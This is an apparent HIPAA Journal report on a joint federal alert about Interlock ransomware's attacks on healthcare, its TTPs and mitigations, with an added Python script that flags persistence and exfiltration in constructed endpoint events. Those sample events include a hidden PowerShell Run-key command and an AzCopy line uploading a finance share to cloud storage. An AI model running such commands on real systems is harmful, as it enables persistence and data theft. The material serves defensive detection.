The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint alert about the Interlock ransomware group, which has accelerated attacks on businesses and critical infrastructure organizations. The alert shares the latest tactics, techniques, and procedures (TTPs) and indicators of compromise (IoCs) collected from investigations of the group’s ransomware attacks in June 2025.
Interlock is a ransomware-as-a-service operation that first emerged in September 2024. The group has attacked entities in multiple sectors but appears to favor organizations in the healthcare and public health (HPH) sector. Healthcare victims include the kidney dialysis giant DaVita, Texas Tech University Health Sciences Center, Kettering Health, Drug and Alcohol Treatment Services, Brockton Neighborhood Health Center, and Naper Grove Vision Care.
Interlock is a financially motivated cybercriminal group that uses ransomware in its attacks on Windows and Linux systems, favoring attacks in North America and Europe. The group engages in double extortion tactics, breaching networks, stealing data, and demanding payment to decrypt files and prevent the publication of the stolen data on its dark web data leak site. The group’s TTPs are constantly evolving, and several new techniques have been observed in recent weeks.
One relatively unusual technique for a ransomware group is the use of compromised legitimate websites for drive-by downloads, disguising the payload as an installer for Google Chrome, Microsoft Edge, and other popular software solutions. These attacks distribute a remote access trojan, which provides initial access. The RAT executes a PowerShell script, which establishes persistence by dropping a file into the Windows Startup Folder to ensure it runs each time the user logs in. Alternatively, a PowerShell command is used to make a run key value in the Windows Registry for persistence.
The group has also been observed using the ClickFix social engineering technique for initial access. This involves tricking individuals into executing a malicious payload by convincing them that doing so will fix a problem on their device – blocking spam emails, removing a fictitious malware infection, etc.
Once initial access has been gained, tools such as Interlock RAT and NodeSnake RAT are used for C2 communications and command execution. The group has been observed using PowerShell to download a credential stealer and keylogger to harvest credentials for lateral movement and privilege escalation. Azure Storage Explorer is used to access Azure storage accounts, AzCopy is used to upload data to the Azure storage blob, and file transfer tools such as WinSCP have also been used for data exfiltration.
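The persistence behaviour described above (a PowerShell-dropped file in the Startup folder, or a Run key written to the registry) and the exfiltration tooling named here (AzCopy, WinSCP, Azure Storage Explorer) are both visible in endpoint telemetry. The following is an added example, not code from the advisory or from The HIPAA Journal, of a small triage script that scans Sysmon-style events for those two patterns. The event records are constructed sample data that mimics Sysmon's field names for Event IDs 1 (process create), 11 (file create) and 13 (registry value set); the list of script hosts, the user-writable path pattern and the `StorageExplorer.exe` binary name are assumptions made for the example.

```python
"""Added example: triage constructed Sysmon-style events for Interlock-like
persistence and exfiltration tooling. Not the advisory's own code."""
import json
import re

# Constructed sample events, one JSON object per line (Sysmon-like field names).
# Events 1, 2, 3 and 4 are the suspicious ones; 5 and 6 are benign controls.
SAMPLE_EVENTS = r"""
{"EventID": 11, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetFilename": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"}
{"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "Details": "powershell.exe -w hidden -File C:\\Users\\jdoe\\AppData\\Roaming\\u.ps1"}
{"EventID": 1, "Image": "C:\\Users\\jdoe\\Downloads\\azcopy.exe", "CommandLine": "azcopy.exe copy C:\\Shares\\Finance https://example.blob.core.windows.net/c1 --recursive", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 1, "Image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe", "CommandLine": "WinSCP.exe /script=C:\\Users\\jdoe\\AppData\\Local\\Temp\\x.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 13, "Image": "C:\\Program Files\\Vendor\\setup.exe", "TargetObject": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent", "Details": "C:\\Program Files\\Vendor\\agent.exe"}
"""

# Startup folder path fragment and Run/RunOnce key fragment (case-insensitive).
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)

# Script interpreters that should rarely be the process creating autoruns (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Run key values pointing into user-writable locations are suspicious (assumption).
USER_WRITABLE_RE = re.compile(r"\\(AppData|Users\\[^\\]+\\Downloads|Temp|ProgramData)\\", re.I)

# Exfiltration tooling named in the advisory; StorageExplorer.exe name is an assumption.
EXFIL_TOOLS = {"azcopy.exe", "winscp.exe", "storageexplorer.exe"}


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event_lines):
    """Return (rule, detail) findings for persistence and exfil-tool events."""
    findings = []
    for raw in event_lines.strip().splitlines():
        ev = json.loads(raw)
        eid = ev.get("EventID")
        image = basename(ev.get("Image", ""))

        if eid == 11 and STARTUP_RE.search(ev.get("TargetFilename", "")):
            # File dropped into a Startup folder by a script host.
            if image in SCRIPT_HOSTS:
                findings.append(("startup_folder_persistence", ev["TargetFilename"]))

        elif eid == 13 and RUN_KEY_RE.search(ev.get("TargetObject", "")):
            # Run key written by a script host, or pointing at a user-writable path.
            details = ev.get("Details", "")
            if image in SCRIPT_HOSTS or USER_WRITABLE_RE.search(details):
                findings.append(("run_key_persistence", ev["TargetObject"]))

        elif eid == 1 and image in EXFIL_TOOLS:
            # Known bulk-transfer tool launched; review destination and parent.
            findings.append(("exfil_tool_execution", ev.get("CommandLine", "")))
    return findings


def count_by_rule(findings):
    """Summarise findings as {rule: count} for a quick dashboard line."""
    counts = {}
    for rule, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for rule, detail in hits:
        print(f"[{rule}] {detail}")
    print(count_by_rule(hits))
```

The benign controls matter: a vendor installer writing a Run key that points into `Program Files` is not flagged, while a Run key written by `powershell.exe` or pointing into `AppData` is. In production the same logic would run over a SIEM query rather than an embedded string, and `exfil_tool_execution` hits should be enriched with the destination host so that legitimate AzCopy use against the organisation's own storage accounts can be tuned out.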
The authoring agencies have made several recommendations to mitigate Interlock threat activity, which include the following:
- Implement a DNS filtering solution to block access to malicious websites
- Implement a web access firewall
- Patch promptly and keep all software and operating systems up to date
- Train end users to spot social engineering and phishing attempts
- Segment networks to restrict lateral movement
- Implement robust identity, credential, and access policies
- Implement multi-factor authentication on all accounts and services as far as possible, ideally phishing-resistant multi-factor authentication
- Ensure backups are made of the entire organization’s data infrastructure, and that backup data is encrypted, immutable, and stored securely off-site
The post Feds Issue Interlock Ransomware Warning as Healthcare Attacks Spike appeared first on The HIPAA Journal.